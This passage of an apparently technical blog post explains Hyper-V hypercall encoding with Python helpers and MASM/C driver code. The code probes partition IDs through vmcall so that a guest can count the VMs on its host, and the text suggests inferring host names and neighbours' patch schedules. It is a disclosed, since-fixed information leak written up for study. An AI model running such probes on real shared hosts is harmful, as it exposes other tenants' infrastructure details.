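    if fast:
        value |= FAST_BIT
    value |= rep_count << REP_COUNT_SHIFT
    value |= rep_start << REP_START_SHIFT
    return value


def split_edx_eax(value):
    """On 32-bit code the input value is passed in EDX:EAX; return (edx, eax)."""
    return (value >> 32) & 0xFFFFFFFF, value & 0xFFFFFFFF


def decode_hypercall_result(value):
    """Return (status, status_name, reps_completed) from a result value."""
    status = value & RESULT_MASK
    reps = (value >> REPS_COMPLETE_SHIFT) & FIELD12_MASK
    return status, HV_STATUS.get(status, "HV_STATUS_0x%04X" % status), reps


if __name__ == "__main__":
    value = encode_hypercall_input(HVCALL_INITIALIZE_PARTITION, fast=True)
    edx, eax = split_edx_eax(value)
    print("input value %#x -> edx=%#x eax=%#x" % (value, edx, eax))   # matches the MASM stub
    # Constructed result value as it would appear in EDX:EAX after vmcall
    print(decode_hypercall_result(0x0006))
```

For a fast hypercall only the low 16 bits of the result matter (the rep fields stay zero), which is why the article's loop can print EAX directly; running the decoder over the printed values turns the raw numbers into HV_STATUS names.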
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (i = 0x0; i <=0x100; i++)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintEx(</span><span style="background-color: white; color: darkslategrey; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DPFLTR_IHVDRIVER_ID</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: #6f008a; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBG_PRINT_LEVEL</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: #a31515; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"i %x VMCALL_EAX %x"</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,i,ARCH_VMCALL_REG_MOD(i));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ARCH_VMCALL_REG_MOD </span><span style="background-color: white; color: purple; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PROC</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> param1:</span><span style="background-color: white; color: purple; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DWORD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">push</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">push</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">push</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edx</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ecx</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, param1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xor</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">eax</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10041h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pop</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ebx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pop</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">edi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pop</span><span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">esi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ARCH_VMCALL_REG_MOD </span><span style="background-color: white; color: purple; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ENDP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As a result (for Windows Server 2012), we obtain</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="216" src="https://lh3.googleusercontent.com/m12JCJ_oOpdXnwxw5ztpOgt6nRZXJY192AkVdpcqPOpQQ-_N9msozBh64m5g8BDjr8s-I5cokHdtAZXEb_gpum43SOZktcgbzwgFJOlX3phLJN_BLyNChEfuHD-hfvX4NHOSN6b-njwYF1o9" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="515" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In case if in the ecx was transferred to the active virtual machine PartitionID, the hypervisor returns 6 (HV_STATUS_ACCESS_DENIED), in other cases - d (HV_STATUS_INVALID_PARTITION_ID). Taking advantage of this fact, and the fact that the ID of each new section is calculated by simple adding 1 to the ID of the previous section, and the ID root-partition is always equal to 1, you can set the number of active virtual machines on the host. To do this, slightly modify the code for the driver:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (i = 0x2; i <=0x10000; i++)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">res = ARCH_VMCALL_REG_MOD(i);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (res == </span><span style="background-color: white; color: #6f008a; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS_INVALID_PARTITION_ID</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintEx(</span><span style="background-color: white; color: darkslategrey; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DPFLTR_IHVDRIVER_ID</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: #6f008a; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBG_PRINT_LEVEL</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: #a31515; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"PartitionID %x VMCALL_EAX %x \n"</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,i,res);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintEx(</span><span style="background-color: white; color: darkslategrey; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DPFLTR_IHVDRIVER_ID</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: #6f008a; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBG_PRINT_LEVEL</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: #a31515; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Number of active virtual machines: %x \n"</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,counter);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and get a list of active sections ID and number:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="54" src="https://lh5.googleusercontent.com/QUNSIIcSCz5ODPERea-jsiuosy5p8x5cCARFNo1UPfSQDjxruaxxYf245t2lfR6d9c4Rw5F2rtGePwW186BDddtJOJPESrRkiJcZu7Ohp2VYpgqkoKMvWrZqj0DWIgHgWbkc5nAqmlfLWZMU" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="351" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The number of loop iterations must be greater than the number of running VMs + number of overloaded since the start VM hypervisor. After restarting the hypervisor numbering of all sections begins again. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These data are available for the following two reasons:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The section PartitionID generated by simply adding 1 to the last used PartitionID.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When processing a hypercall the hypervisor first checks the validity of the transferred PartitionID and just in case whats the referred PartitionID active partition, it checks the rights to perform hypercall.</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This feature hypervisor can be used to determine the number of virtual machines running on a given host server. For the name of the host server, you can peek in the registry of the guest OS under HKLM \ Software \ Microsoft \ Virtual Machine \ Guest \ Parameter, which contains data on the host operating system, transmitted by Key Value Pair Integration Component, which is normally enabled by default. Also controlled restarting the virtual machine on the second Monday of the month and secure it PartitionID (there is quite a high probability that he will be the last in the list of active VM), you can determine whether a virtual neighbors on their servers coming out every second Tuesday security fixes. However, the reality is quite difficult to imagine that someone will need this information ...</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This hypervisor behavior could be observed in the assembly 6.3.9431.0 (Windows Server 2012 R2 Preview), but Microsoft recognized this behavior as "unexpected behavior" and eliminated him in the assembly 6.3.9600.16384 ". The TLFS changes were made to allow for the enforcement of such hypercall behavior only from root-partition.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Statement which is processing vmcall in the hypervisor runs roughly as follows:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">check ring protection in which the statement has been issued, if the statement was executed in ring 3, then processing stops;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if the instruction is executed in ring0, it checks, whether at the same processor LongMode.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">depending on the operating mode of the processor to perform two different procedures, the logic is quite similar;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">each procedure loads a pointer to an array of structures that contain the parameters necessary for processing each of hypercall 0 to 8C (decryption codes listed in hypercall Hypervisor Top-Level Functional Specification: Windows Server 2012 R2. Appendix B: Hypercall Code Reference). One of the elements of each structure is a pointer to a procedure for processing hypercall:</span></div>
</li>
</ul>
